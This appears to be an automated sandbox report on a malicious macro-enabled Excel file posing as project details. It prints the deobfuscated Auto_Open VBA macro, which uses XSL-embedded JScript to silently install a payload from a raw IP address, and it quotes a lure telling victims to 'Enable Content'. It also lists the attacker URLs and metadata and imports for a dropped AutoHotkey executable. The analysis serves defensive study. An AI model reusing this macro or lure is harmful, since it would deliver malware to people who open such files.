205a543c733e

Filters:

File Name	Category	Type	Verdict	Actions

C:\Users\kEecfMwgj\Desktop\Mobile_App_Project_Details.xls

Sample File

Office File

MIME Type	application/vnd.ms-excel.sheet.macroEnabled.12
File Size	70.16 KB
MD5	01160f0692b8c141b421202c4f82e875
SHA1	11f4bd8e2057249b7b214d05026ef830b2c24542
SHA256	205a543c733eea51309dea6fa850f87bcaeefa1835bd0955ea43923820e2834e
SSDeep	1536:iytDWOI4Deap+fjSCqP533pQp6mPw0MlKOhqVqr/36vYa:/tHeCCShP536pdPOlFqVY/1a
ImpHash	-

Office Information

Creator	User
Last Modified By	support
Create Time	2015-06-05 18:17 (UTC)
Modify Time	2024-10-03 12:35 (UTC)
Application	Microsoft Excel
App Version	16.0300
Document Security	NONE
Worksheets	1
Titles Of Parts	Sheet 1
ScaleCrop	False
SharedDoc	False

VBA Macros (1)

Macro #1: Module1

Deobfuscated Code


                   Attribute VB_Name = "Module1"

Sub Auto_Open()
    LoadAndProcessXML
End Sub

Sub LoadAndProcessXML()
    If ActiveSheet.Shapes.Count > 0 Then
        Dim xmlDoc As New MSXML2.DOMDocument
        If xmlDoc.loadXML("<?xml version='1.0'?> <stylesheet xmlns=""http://www.w3.org/1999/XSL/Transform"" xmlns:ms=""urn:schemas-microsoft-com:xslt"" xmlns:user=""placeholder"" version=""1.0""> <ms:script implements-prefix=""user"" language=""JScript""> <![CDATA[ var r = new ActiveXObject(""WindowsInstaller.Installer""); r.UILevel = 2; r.InstallProduct(""http://162.250.124.142/files/ 435842fec424a8586e5855128884b319 ""); ]]> </ms:script> </stylesheet>") Then
            Dim transformedDoc As New MSXML2.DOMDocument
            xmlDoc.transformNodeToObject xmlDoc.CloneNode(True), transformedDoc
        End If
    End If
End Sub

Original Code


                   Attribute VB_Name = "Module1"
Sub Auto_Open()
    Call LoadAndProcessXML
End Sub

Sub LoadAndProcessXML()
    If ActiveSheet.Shapes.Count > 0 Then
        Dim xmlContent As String
        xmlContent = ActiveSheet.Shapes(1).TextFrame.Characters.Text
        
        Dim xmlDoc As New MSXML2.DOMDocument
        If xmlDoc.loadXML(xmlContent) Then
            Dim transformedDoc As New MSXML2.DOMDocument
            xmlDoc.transformNodeToObject xmlDoc.CloneNode(True), transformedDoc
        End If
    End If
End Sub

Extracted Image Texts (1)

Image #1: image1.png

                     Microsoft Excel You are trying to open a file created in a previous version of Microsoft Office Follow these steps: Open the document in «Microsoft Excel» and check for yellow bar at the top and click on «Enable Editing» then click on «Enable Content»
                    

Extracted URLs (3)

URL	WHOIS Data	Reputation Status	Recursively Submitted	Actions
http://www.w3.org/1999/XSL/Transform	Show WHOIS	Not Available	-	... Actions Show URL Submit URL
http://162.250.124.142/files/ 435842fec424a8586e5855128884b319	Not Queried	Not Available	-	... Actions Show URL Submit URL
http://162.250.124.142/files/	Not Queried	Not Available	-	... Actions Show URL Submit URL

C:\Persistent\DSAWcfProxy.exe

Dropped File

Binary

MIME Type	application/vnd.microsoft.portable-executable
File Size	893.00 KB
MD5	b6af97aa32c636c3c4e87bb768a3ceb7
SHA1	83054af67df43ae70c7f8ac6e8a499d9c9dd82ec
SHA256	ba35b8b4346b79b8bb4f97360025cb6befaf501b03149a3b5fef8f07bdf265c7
SSDeep	24576:Kbi/QhDC8mY93kyw8hC2A5CxLbRpWrzzZyP4UMdg:1/QMnl5YL7WzZyQRd
ImpHash	c07a5e2247b48b561b9ee6a9e632f518

File Reputation Information

Verdict

Clean

PE Information

Image Base	0x00400000
Entry Point	0x0049D3B0
Size Of Code	0x000AC200
Size Of Initialized Data	0x00038E00
File Type	IMAGE_FILE_EXECUTABLE_IMAGE
Subsystem	IMAGE_SUBSYSTEM_WINDOWS_GUI
Machine Type	IMAGE_FILE_MACHINE_I386
Compile Timestamp	2024-03-16 06:02 (UTC)

Version Information (8)

FileDescription	AutoHotkey Unicode 32-bit
FileVersion	1.1.37.02
InternalName	AutoHotkey
LegalCopyright	Copyright (C) 2003-2013
CompanyName	AutoHotkey Foundation LLC
OriginalFilename	AutoHotkey.exe
ProductName	AutoHotkey
ProductVersion	1.1.37.02

Sections (4)

Name	Virtual Address	Virtual Size	Raw Data Size	Raw Data Offset	Flags	Entropy
.text	0x00401000	0x000AC011	0x000AC200	0x00000400	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	6.64
.rdata	0x004AE000	0x00026188	0x00026200	0x000AC600	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	4.84
.data	0x004D5000	0x00009204	0x00003400	0x000D2800	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	4.16
.rsrc	0x004DF000	0x000096C0	0x00009800	0x000D5C00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	5.65

Imports (14)

WSOCK32.dll (22)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
WSACleanup	0x00000074	0x004AE708	0x000D21C8	0x000D07C8	-
recv	0x00000010	0x004AE70C	0x000D21CC	0x000D07CC	-
socket	0x00000017	0x004AE710	0x000D21D0	0x000D07D0	-
getservbyname	0x00000037	0x004AE714	0x000D21D4	0x000D07D4	-
WSASetLastError	0x00000070	0x004AE718	0x000D21D8	0x000D07D8	-
WSAAsyncSelect	0x00000065	0x004AE71C	0x000D21DC	0x000D07DC	-
closesocket	0x00000003	0x004AE720	0x000D21E0	0x000D07E0	-
gethostbyaddr	0x00000033	0x004AE724	0x000D21E4	0x000D07E4	-
gethostbyname	0x00000034	0x004AE728	0x000D21E8	0x000D07E8	-
send	0x00000013	0x004AE72C	0x000D21EC	0x000D07EC	-
getservbyport	0x00000038	0x004AE730	0x000D21F0	0x000D07F0	-
gethostname	0x00000039	0x004AE734	0x000D21F4	0x000D07F4	-
inet_ntoa	0x0000000C	0x004AE738	0x000D21F8	0x000D07F8	-
connect	0x00000004	0x004AE73C	0x000D21FC	0x000D07FC	-
inet_addr	0x0000000B	0x004AE740	0x000D2200	0x000D0800	-
WSAStartup	0x00000073	0x004AE744	0x000D2204	0x000D0804	-
ioctlsocket	0x0000000A	0x004AE748	0x000D2208	0x000D0808	-
htonl	0x00000008	0x004AE74C	0x000D220C	0x000D080C	-
WSAGetLastError	0x0000006F	0x004AE750	0x000D2210	0x000D0810	-
htons	0x00000009	0x004AE754	0x000D2214	0x000D0814	-
ntohs	0x0000000F	0x004AE758	0x000D2218	0x000D0818	-
shutdown	0x00000016	0x004AE75C	0x000D221C	0x000D081C	-

WINMM.dll (12)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
waveOutGetVolume	-	0x004AE6D4	0x000D2194	0x000D0794	0x000000B2
mixerGetLineInfoW	-	0x004AE6D8	0x000D2198	0x000D0798	0x0000006A
mixerSetControlDetails	-	0x004AE6DC	0x000D219C	0x000D079C	0x0000006E
mixerGetControlDetailsW	-	0x004AE6E0	0x000D21A0	0x000D07A0	0x00000063
mixerGetLineControlsW	-	0x004AE6E4	0x000D21A4	0x000D07A4	0x00000068
mixerGetDevCapsW	-	0x004AE6E8	0x000D21A8	0x000D07A8	0x00000065
waveOutSetVolume	-	0x004AE6EC	0x000D21AC	0x000D07AC	0x000000BB
mixerClose	-	0x004AE6F0	0x000D21B0	0x000D07B0	0x00000061
mixerOpen	-	0x004AE6F4	0x000D21B4	0x000D07B4	0x0000006D
mciSendStringW	-	0x004AE6F8	0x000D21B8	0x000D07B8	0x00000032
joyGetDevCapsW	-	0x004AE6FC	0x000D21BC	0x000D07BC	0x00000018
joyGetPosEx	-	0x004AE700	0x000D21C0	0x000D07C0	0x0000001B

VERSION.dll (3)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetFileVersionInfoW	-	0x004AE6AC	0x000D216C	0x000D076C	0x00000006
VerQueryValueW	-	0x004AE6B0	0x000D2170	0x000D0770	0x0000000E
GetFileVersionInfoSizeW	-	0x004AE6B4	0x000D2174	0x000D0774	0x00000005

COMCTL32.dll (7)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
ImageList_GetIconSize	-	0x004AE050	0x000D1B10	0x000D0110	0x00000063
ImageList_Create	-	0x004AE054	0x000D1B14	0x000D0114	0x00000053
ImageList_Destroy	-	0x004AE058	0x000D1B18	0x000D0118	0x00000054
ImageList_AddMasked	-	0x004AE05C	0x000D1B1C	0x000D011C	0x0000004F
ImageList_ReplaceIcon	-	0x004AE060	0x000D1B20	0x000D0120	0x0000006F
CreateStatusWindowW	-	0x004AE064	0x000D1B24	0x000D0124	0x0000000C
InitCommonControlsEx	-	0x004AE068	0x000D1B28	0x000D0128	0x0000007B

PSAPI.DLL (2)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GetModuleBaseNameW	-	0x004AE3BC	0x000D1E7C	0x000D047C	0x0000000E
GetModuleFileNameExW	-	0x004AE3C0	0x000D1E80	0x000D0480	0x00000010

WININET.dll (5)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
InternetReadFile	-	0x004AE6BC	0x000D217C	0x000D077C	0x0000009F
InternetOpenUrlW	-	0x004AE6C0	0x000D2180	0x000D0780	0x00000099
InternetCloseHandle	-	0x004AE6C4	0x000D2184	0x000D0784	0x0000006B
InternetReadFileExA	-	0x004AE6C8	0x000D2188	0x000D0788	0x000000A0
InternetOpenW	-	0x004AE6CC	0x000D218C	0x000D078C	0x0000009A

KERNEL32.dll (150)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
GlobalUnlock	-	0x004AE10C	0x000D1BCC	0x000D01CC	0x000002C5
GetEnvironmentVariableW	-	0x004AE110	0x000D1BD0	0x000D01D0	0x000001DC
FreeLibrary	-	0x004AE114	0x000D1BD4	0x000D01D4	0x00000162
WideCharToMultiByte	-	0x004AE118	0x000D1BD8	0x000D01D8	0x00000511
GetSystemDirectoryA	-	0x004AE11C	0x000D1BDC	0x000D01DC	0x0000026F
GetProcAddress	-	0x004AE120	0x000D1BE0	0x000D01E0	0x00000245
LoadLibraryA	-	0x004AE124	0x000D1BE4	0x000D01E4	0x0000033C
GetCurrentThreadId	-	0x004AE128	0x000D1BE8	0x000D01E8	0x000001C5
lstrcmpiW	-	0x004AE12C	0x000D1BEC	0x000D01EC	0x00000545
GetStringTypeExW	-	0x004AE130	0x000D1BF0	0x000D01F0	0x00000268
CreateThread	-	0x004AE134	0x000D1BF4	0x000D01F4	0x000000B5
SetThreadPriority	-	0x004AE138	0x000D1BF8	0x000D01F8	0x00000499
GetExitCodeThread	-	0x004AE13C	0x000D1BFC	0x000D01FC	0x000001E0
CloseHandle	-	0x004AE140	0x000D1C00	0x000D0200	0x00000052
CreateMutexW	-	0x004AE144	0x000D1C04	0x000D0204	0x0000009E
GetLastError	-	0x004AE148	0x000D1C08	0x000D0208	0x00000202
LoadLibraryW	-	0x004AE14C	0x000D1C0C	0x000D020C	0x0000033F
GetModuleHandleW	-	0x004AE150	0x000D1C10	0x000D0210	0x00000218
GetVersionExW	-	0x004AE154	0x000D1C14	0x000D0214	0x000002A4
InitializeCriticalSection	-	0x004AE158	0x000D1C18	0x000D0218	0x000002E2
DeleteCriticalSection	-	0x004AE15C	0x000D1C1C	0x000D021C	0x000000D1
GetModuleFileNameW	-	0x004AE160	0x000D1C20	0x000D0220	0x00000214
GetFileAttributesW	-	0x004AE164	0x000D1C24	0x000D0224	0x000001EA
GetFullPathNameW	-	0x004AE168	0x000D1C28	0x000D0228	0x000001FB
GetSystemTimeAsFileTime	-	0x004AE16C	0x000D1C2C	0x000D022C	0x00000279
LoadResource	-	0x004AE170	0x000D1C30	0x000D0230	0x00000341
LockResource	-	0x004AE174	0x000D1C34	0x000D0234	0x00000354
SizeofResource	-	0x004AE178	0x000D1C38	0x000D0238	0x000004B1
GetShortPathNameW	-	0x004AE17C	0x000D1C3C	0x000D023C	0x00000261
FindFirstFileW	-	0x004AE180	0x000D1C40	0x000D0240	0x00000139
FindNextFileW	-	0x004AE184	0x000D1C44	0x000D0244	0x00000145
FindClose	-	0x004AE188	0x000D1C48	0x000D0248	0x0000012E
FileTimeToLocalFileTime	-	0x004AE18C	0x000D1C4C	0x000D024C	0x00000124
SetEnvironmentVariableW	-	0x004AE190	0x000D1C50	0x000D0250	0x00000457
Beep	-	0x004AE194	0x000D1C54	0x000D0254	0x00000036
MoveFileW	-	0x004AE198	0x000D1C58	0x000D0258	0x00000363
OutputDebugStringW	-	0x004AE19C	0x000D1C5C	0x000D025C	0x0000038A
CreateProcessW	-	0x004AE1A0	0x000D1C60	0x000D0260	0x000000A8
MultiByteToWideChar	-	0x004AE1A4	0x000D1C64	0x000D0264	0x00000367
GetExitCodeProcess	-	0x004AE1A8	0x000D1C68	0x000D0268	0x000001DF
WriteProcessMemory	-	0x004AE1AC	0x000D1C6C	0x000D026C	0x0000052E
ReadProcessMemory	-	0x004AE1B0	0x000D1C70	0x000D0270	0x000003C3
GetCurrentProcessId	-	0x004AE1B4	0x000D1C74	0x000D0274	0x000001C1
OpenProcess	-	0x004AE1B8	0x000D1C78	0x000D0278	0x00000380
TerminateProcess	-	0x004AE1BC	0x000D1C7C	0x000D027C	0x000004C0
SetPriorityClass	-	0x004AE1C0	0x000D1C80	0x000D0280	0x0000047D
GlobalFree	-	0x004AE1C4	0x000D1C84	0x000D0284	0x000002BA
GetLocalTime	-	0x004AE1C8	0x000D1C88	0x000D0288	0x00000203
GetDateFormatW	-	0x004AE1CC	0x000D1C8C	0x000D028C	0x000001C8
GetTimeFormatW	-	0x004AE1D0	0x000D1C90	0x000D0290	0x00000297
GetDiskFreeSpaceExW	-	0x004AE1D4	0x000D1C94	0x000D0294	0x000001CE
SetVolumeLabelW	-	0x004AE1D8	0x000D1C98	0x000D0298	0x000004A9
CreateFileW	-	0x004AE1DC	0x000D1C9C	0x000D029C	0x0000008F
DeviceIoControl	-	0x004AE1E0	0x000D1CA0	0x000D02A0	0x000000DD
GetDriveTypeW	-	0x004AE1E4	0x000D1CA4	0x000D02A4	0x000001D3
GetVolumeInformationW	-	0x004AE1E8	0x000D1CA8	0x000D02A8	0x000002A7
GetDiskFreeSpaceW	-	0x004AE1EC	0x000D1CAC	0x000D02AC	0x000001CF
GetCurrentDirectoryW	-	0x004AE1F0	0x000D1CB0	0x000D02B0	0x000001BF
CreateDirectoryW	-	0x004AE1F4	0x000D1CB4	0x000D02B4	0x00000081
ReadFile	-	0x004AE1F8	0x000D1CB8	0x000D02B8	0x000003C0
WriteFile	-	0x004AE1FC	0x000D1CBC	0x000D02BC	0x00000525
DeleteFileW	-	0x004AE200	0x000D1CC0	0x000D02C0	0x000000D6
CopyFileW	-	0x004AE204	0x000D1CC4	0x000D02C4	0x00000075
SetFileAttributesW	-	0x004AE208	0x000D1CC8	0x000D02C8	0x00000461
LocalFileTimeToFileTime	-	0x004AE20C	0x000D1CCC	0x000D02CC	0x00000346
SetFileTime	-	0x004AE210	0x000D1CD0	0x000D02D0	0x0000046A
GetFileSizeEx	-	0x004AE214	0x000D1CD4	0x000D02D4	0x000001F1
GetSystemTime	-	0x004AE218	0x000D1CD8	0x000D02D8	0x00000277
GetSystemDefaultUILanguage	-	0x004AE21C	0x000D1CDC	0x000D02DC	0x0000026E
GetComputerNameW	-	0x004AE220	0x000D1CE0	0x000D02E0	0x0000018F
GetSystemWindowsDirectoryW	-	0x004AE224	0x000D1CE4	0x000D02E4	0x0000027C
GetTempPathW	-	0x004AE228	0x000D1CE8	0x000D02E8	0x00000285
EnterCriticalSection	-	0x004AE22C	0x000D1CEC	0x000D02EC	0x000000EE
LeaveCriticalSection	-	0x004AE230	0x000D1CF0	0x000D02F0	0x00000339
VirtualProtect	-	0x004AE234	0x000D1CF4	0x000D02F4	0x000004EF
QueryDosDeviceW	-	0x004AE238	0x000D1CF8	0x000D02F8	0x000003A0
CompareStringW	-	0x004AE23C	0x000D1CFC	0x000D02FC	0x00000064
RemoveDirectoryW	-	0x004AE240	0x000D1D00	0x000D0300	0x00000403
GetCurrentProcess	-	0x004AE244	0x000D1D04	0x000D0304	0x000001C0
CreateToolhelp32Snapshot	-	0x004AE248	0x000D1D08	0x000D0308	0x000000BE
Process32FirstW	-	0x004AE24C	0x000D1D0C	0x000D030C	0x00000396
Process32NextW	-	0x004AE250	0x000D1D10	0x000D0310	0x00000398
FormatMessageW	-	0x004AE254	0x000D1D14	0x000D0314	0x0000015E
GetPrivateProfileStringW	-	0x004AE258	0x000D1D18	0x000D0318	0x00000242
GetPrivateProfileSectionW	-	0x004AE25C	0x000D1D1C	0x000D031C	0x00000240
GetPrivateProfileSectionNamesW	-	0x004AE260	0x000D1D20	0x000D0320	0x0000023F
WritePrivateProfileStringW	-	0x004AE264	0x000D1D24	0x000D0324	0x0000052B
WritePrivateProfileSectionW	-	0x004AE268	0x000D1D28	0x000D0328	0x00000529
SetEndOfFile	-	0x004AE26C	0x000D1D2C	0x000D032C	0x00000453
GetACP	-	0x004AE270	0x000D1D30	0x000D0330	0x00000168
GetFileType	-	0x004AE274	0x000D1D34	0x000D0334	0x000001F3
GetStdHandle	-	0x004AE278	0x000D1D38	0x000D0338	0x00000264
SetFilePointerEx	-	0x004AE27C	0x000D1D3C	0x000D033C	0x00000467
SystemTimeToFileTime	-	0x004AE280	0x000D1D40	0x000D0340	0x000004BD
FileTimeToSystemTime	-	0x004AE284	0x000D1D44	0x000D0344	0x00000125
GetFileSize	-	0x004AE288	0x000D1D48	0x000D0348	0x000001F0
VirtualAllocEx	-	0x004AE28C	0x000D1D4C	0x000D034C	0x000004EA
VirtualFreeEx	-	0x004AE290	0x000D1D50	0x000D0350	0x000004ED
EnumResourceNamesW	-	0x004AE294	0x000D1D54	0x000D0354	0x00000102
LoadLibraryExW	-	0x004AE298	0x000D1D58	0x000D0358	0x0000033E
GlobalSize	-	0x004AE29C	0x000D1D5C	0x000D035C	0x000002C2
GlobalAlloc	-	0x004AE2A0	0x000D1D60	0x000D0360	0x000002B3
GlobalLock	-	0x004AE2A4	0x000D1D64	0x000D0364	0x000002BE
FindResourceW	-	0x004AE2A8	0x000D1D68	0x000D0368	0x0000014E
SetErrorMode	-	0x004AE2AC	0x000D1D6C	0x000D036C	0x00000458
GetCPInfo	-	0x004AE2B0	0x000D1D70	0x000D0370	0x00000172
SetCurrentDirectoryW	-	0x004AE2B4	0x000D1D74	0x000D0374	0x0000044D
Sleep	-	0x004AE2B8	0x000D1D78	0x000D0378	0x000004B2
GetTickCount	-	0x004AE2BC	0x000D1D7C	0x000D037C	0x00000293
MulDiv	-	0x004AE2C0	0x000D1D80	0x000D0380	0x00000366
ExitProcess	-	0x004AE2C4	0x000D1D84	0x000D0384	0x00000119
HeapSize	-	0x004AE2C8	0x000D1D88	0x000D0388	0x000002D4
HeapQueryInformation	-	0x004AE2CC	0x000D1D8C	0x000D038C	0x000002D1
GetCommandLineW	-	0x004AE2D0	0x000D1D90	0x000D0390	0x00000187
HeapSetInformation	-	0x004AE2D4	0x000D1D94	0x000D0394	0x000002D3
GetStartupInfoW	-	0x004AE2D8	0x000D1D98	0x000D0398	0x00000263
InterlockedIncrement	-	0x004AE2DC	0x000D1D9C	0x000D039C	0x000002EF
InterlockedDecrement	-	0x004AE2E0	0x000D1DA0	0x000D03A0	0x000002EB
HeapAlloc	-	0x004AE2E4	0x000D1DA4	0x000D03A4	0x000002CB
HeapFree	-	0x004AE2E8	0x000D1DA8	0x000D03A8	0x000002CF
HeapReAlloc	-	0x004AE2EC	0x000D1DAC	0x000D03AC	0x000002D2
GetOEMCP	-	0x004AE2F0	0x000D1DB0	0x000D03B0	0x00000237
IsValidCodePage	-	0x004AE2F4	0x000D1DB4	0x000D03B4	0x0000030A
TlsAlloc	-	0x004AE2F8	0x000D1DB8	0x000D03B8	0x000004C5
TlsGetValue	-	0x004AE2FC	0x000D1DBC	0x000D03BC	0x000004C7
TlsSetValue	-	0x004AE300	0x000D1DC0	0x000D03C0	0x000004C8
TlsFree	-	0x004AE304	0x000D1DC4	0x000D03C4	0x000004C6
UnhandledExceptionFilter	-	0x004AE308	0x000D1DC8	0x000D03C8	0x000004D3
SetUnhandledExceptionFilter	-	0x004AE30C	0x000D1DCC	0x000D03CC	0x000004A5
IsDebuggerPresent	-	0x004AE310	0x000D1DD0	0x000D03D0	0x00000300
GetStringTypeW	-	0x004AE314	0x000D1DD4	0x000D03D4	0x00000269
HeapCreate	-	0x004AE318	0x000D1DD8	0x000D03D8	0x000002CD
InitializeCriticalSectionAndSpinCount	-	0x004AE31C	0x000D1DDC	0x000D03DC	0x000002E3
RaiseException	-	0x004AE320	0x000D1DE0	0x000D03E0	0x000003B1
IsProcessorFeaturePresent	-	0x004AE324	0x000D1DE4	0x000D03E4	0x00000304
LCMapStringW	-	0x004AE328	0x000D1DE8	0x000D03E8	0x0000032D
RtlUnwind	-	0x004AE32C	0x000D1DEC	0x000D03EC	0x00000418
GetConsoleCP	-	0x004AE330	0x000D1DF0	0x000D03F0	0x0000019A
GetConsoleMode	-	0x004AE334	0x000D1DF4	0x000D03F4	0x000001AC
FreeEnvironmentStringsW	-	0x004AE338	0x000D1DF8	0x000D03F8	0x00000161
GetEnvironmentStringsW	-	0x004AE33C	0x000D1DFC	0x000D03FC	0x000001DA
SetHandleCount	-	0x004AE340	0x000D1E00	0x000D0400	0x0000046F
QueryPerformanceCounter	-	0x004AE344	0x000D1E04	0x000D0404	0x000003A7
SetFilePointer	-	0x004AE348	0x000D1E08	0x000D0408	0x00000466
WriteConsoleW	-	0x004AE34C	0x000D1E0C	0x000D040C	0x00000524
SetStdHandle	-	0x004AE350	0x000D1E10	0x000D0410	0x00000487
FlushFileBuffers	-	0x004AE354	0x000D1E14	0x000D0414	0x00000157
GetProcessHeap	-	0x004AE358	0x000D1E18	0x000D0418	0x0000024A
SetLastError	-	0x004AE35C	0x000D1E1C	0x000D041C	0x00000473
VirtualQuery	-	0x004AE360	0x000D1E20	0x000D0420	0x000004F1

USER32.dll (170)

API Name	Ordinal	IAT Address	Thunk RVA	Thunk Offset	Hint
SetFocus	-	0x004AE400	0x000D1EC0	0x000D04C0	0x00000292
SetWindowRgn	-	0x004AE404	0x000D1EC4	0x000D04C4	0x000002C7
SetWindowPos	-	0x004AE408	0x000D1EC8	0x000D04C8	0x000002C6
SetLayeredWindowAttributes	-	0x004AE40C	0x000D1ECC	0x000D04CC	0x00000298
InvalidateRect	-	0x004AE410	0x000D1ED0	0x000D04D0	0x000001BE
EnableWindow	-	0x004AE414	0x000D1ED4	0x000D04D4	0x000000D8
GetWindowTextLengthW	-	0x004AE418	0x000D1ED8	0x000D04D8	0x000001A2
EnumWindows	-	0x004AE41C	0x000D1EDC	0x000D04DC	0x000000F2
IsZoomed	-	0x004AE420	0x000D1EE0	0x000D04E0	0x000001E2
IsIconic	-	0x004AE424	0x000D1EE4	0x000D04E4	0x000001D1
EnumDisplayMonitors	-	0x004AE428	0x000D1EE8	0x000D04E8	0x000000E6
RegisterWindowMessageW	-	0x004AE42C	0x000D1EEC	0x000D04EC	0x00000263
GetSysColor	-	0x004AE430	0x000D1EF0	0x000D04F0	0x0000017B
GetSysColorBrush	-	0x004AE434	0x000D1EF4	0x000D04F4	0x0000017C
DrawIconEx	-	0x004AE438	0x000D1EF8	0x000D04F8	0x000000C8
FillRect	-	0x004AE43C	0x000D1EFC	0x000D04FC	0x000000F6
DefWindowProcW	-	0x004AE440	0x000D1F00	0x000D0500	0x0000009C
SetForegroundWindow	-	0x004AE444	0x000D1F04	0x000D0504	0x00000293
DialogBoxParamW	-	0x004AE448	0x000D1F08	0x000D0508	0x000000AC
SendDlgItemMessageW	-	0x004AE44C	0x000D1F0C	0x000D050C	0x00000273
GetDlgItem	-	0x004AE450	0x000D1F10	0x000D0510	0x00000127
SetDlgItemTextW	-	0x004AE454	0x000D1F14	0x000D0514	0x00000290
MessageBeep	-	0x004AE458	0x000D1F18	0x000D0518	0x0000020D
GetCursorInfo	-	0x004AE45C	0x000D1F1C	0x000D051C	0x0000011F
GetLastInputInfo	-	0x004AE460	0x000D1F20	0x000D0520	0x00000145
GetSystemMenu	-	0x004AE464	0x000D1F24	0x000D0524	0x0000017D
GetMenuItemCount	-	0x004AE468	0x000D1F28	0x000D0528	0x00000151
GetMenuItemID	-	0x004AE46C	0x000D1F2C	0x000D052C	0x00000152
GetSubMenu	-	0x004AE470	0x000D1F30	0x000D0530	0x0000017A
GetMenuStringW	-	0x004AE474	0x000D1F34	0x000D0534	0x00000158
ExitWindowsEx	-	0x004AE478	0x000D1F38	0x000D0538	0x000000F5
SetMenu	-	0x004AE47C	0x000D1F3C	0x000D053C	0x0000029C
FlashWindow	-	0x004AE480	0x000D1F40	0x000D0540	0x000000FB
GetPropW	-	0x004AE484	0x000D1F44	0x000D0544	0x0000016B
SetPropW	-	0x004AE488	0x000D1F48	0x000D0548	0x000002AD
RemovePropW	-	0x004AE48C	0x000D1F4C	0x000D054C	0x00000269
MapWindowPoints	-	0x004AE490	0x000D1F50	0x000D0550	0x00000209
RedrawWindow	-	0x004AE494	0x000D1F54	0x000D0554	0x0000024A
SetParent	-	0x004AE498	0x000D1F58	0x000D0558	0x000002A6
GetClassInfoExW	-	0x004AE49C	0x000D1F5C	0x000D055C	0x0000010D
DefDlgProcW	-	0x004AE4A0	0x000D1F60	0x000D0560	0x00000095
GetAncestor	-	0x004AE4A4	0x000D1F64	0x000D0564	0x00000104
UpdateWindow	-	0x004AE4A8	0x000D1F68	0x000D0568	0x00000311
GetMessagePos	-	0x004AE4AC	0x000D1F6C	0x000D056C	0x0000015B
GetClassLongW	-	0x004AE4B0	0x000D1F70	0x000D0570	0x00000110
CallWindowProcW	-	0x004AE4B4	0x000D1F74	0x000D0574	0x0000001E
CheckRadioButton	-	0x004AE4B8	0x000D1F78	0x000D0578	0x00000041
IntersectRect	-	0x004AE4BC	0x000D1F7C	0x000D057C	0x000001BD
GetUpdateRect	-	0x004AE4C0	0x000D1F80	0x000D0580	0x00000187
PtInRect	-	0x004AE4C4	0x000D1F84	0x000D0584	0x00000240
CreateDialogIndirectParamW	-	0x004AE4C8	0x000D1F88	0x000D0588	0x00000061
CreateAcceleratorTableW	-	0x004AE4CC	0x000D1F8C	0x000D058C	0x00000058
DestroyAcceleratorTable	-	0x004AE4D0	0x000D1F90	0x000D0590	0x000000A0
InsertMenuItemW	-	0x004AE4D4	0x000D1F94	0x000D0594	0x000001B9
SetMenuDefaultItem	-	0x004AE4D8	0x000D1F98	0x000D0598	0x0000029E
RemoveMenu	-	0x004AE4DC	0x000D1F9C	0x000D059C	0x00000267
SetMenuItemInfoW	-	0x004AE4E0	0x000D1FA0	0x000D05A0	0x000002A2
IsMenu	-	0x004AE4E4	0x000D1FA4	0x000D05A4	0x000001D2
GetMenuItemInfoW	-	0x004AE4E8	0x000D1FA8	0x000D05A8	0x00000154
CreateMenu	-	0x004AE4EC	0x000D1FAC	0x000D05AC	0x0000006A
CreatePopupMenu	-	0x004AE4F0	0x000D1FB0	0x000D05B0	0x0000006B
SetMenuInfo	-	0x004AE4F4	0x000D1FB4	0x000D05B4	0x0000029F
AppendMenuW	-	0x004AE4F8	0x000D1FB8	0x000D05B8	0x0000000A
DestroyMenu	-	0x004AE4FC	0x000D1FBC	0x000D05BC	0x000000A4
TrackPopupMenuEx	-	0x004AE500	0x000D1FC0	0x000D05C0	0x000002F7
CopyImage	-	0x004AE504	0x000D1FC4	0x000D05C4	0x00000054
SetActiveWindow	-	0x004AE508	0x000D1FC8	0x000D05C8	0x0000027F
CreateIconFromResourceEx	-	0x004AE50C	0x000D1FCC	0x000D05CC	0x00000066
EnumClipboardFormats	-	0x004AE510	0x000D1FD0	0x000D05D0	0x000000E0
GetWindow	-	0x004AE514	0x000D1FD4	0x000D05D4	0x0000018E
BringWindowToTop	-	0x004AE518	0x000D1FD8	0x000D05D8	0x00000010
GetTopWindow	-	0x004AE51C	0x000D1FDC	0x000D05DC	0x00000185
GetQueueStatus	-	0x004AE520	0x000D1FE0	0x000D05E0	0x0000016C
PostQuitMessage	-	0x004AE524	0x000D1FE4	0x000D05E4	0x00000237
LoadImageW	-	0x004AE528	0x000D1FE8	0x000D05E8	0x000001EF
IsWindowVisible	-	0x004AE52C	0x000D1FEC	0x000D05EC	0x000001E0
SetClipboardViewer	-	0x004AE530	0x000D1FF0	0x000D05F0	0x00000287
LoadAcceleratorsW	-	0x004AE534	0x000D1FF4	0x000D05F4	0x000001E5
EnableMenuItem	-	0x004AE538	0x000D1FF8	0x000D05F8	0x000000D6
GetMenu	-	0x004AE53C	0x000D1FFC	0x000D05FC	0x0000014B
CreateWindowExW	-	0x004AE540	0x000D2000	0x000D0600	0x0000006E
RegisterClassExW	-	0x004AE544	0x000D2004	0x000D0604	0x0000024D
LoadCursorW	-	0x004AE548	0x000D2008	0x000D0608	0x000001EB
DestroyIcon	-	0x004AE54C	0x000D200C	0x000D060C	0x000000A3
DestroyWindow	-	0x004AE550	0x000D2010	0x000D0610	0x000000A6
IsCharAlphaW	-	0x004AE554	0x000D2014	0x000D0614	0x000001C4
MapVirtualKeyW	-	0x004AE558	0x000D2018	0x000D0618	0x00000208
VkKeyScanExW	-	0x004AE55C	0x000D201C	0x000D061C	0x00000320
MapVirtualKeyExW	-	0x004AE560	0x000D2020	0x000D0620	0x00000207
GetKeyboardLayoutNameW	-	0x004AE564	0x000D2024	0x000D0624	0x00000141
ActivateKeyboardLayout	-	0x004AE568	0x000D2028	0x000D0628	0x00000000
GetGUIThreadInfo	-	0x004AE56C	0x000D202C	0x000D062C	0x0000012E
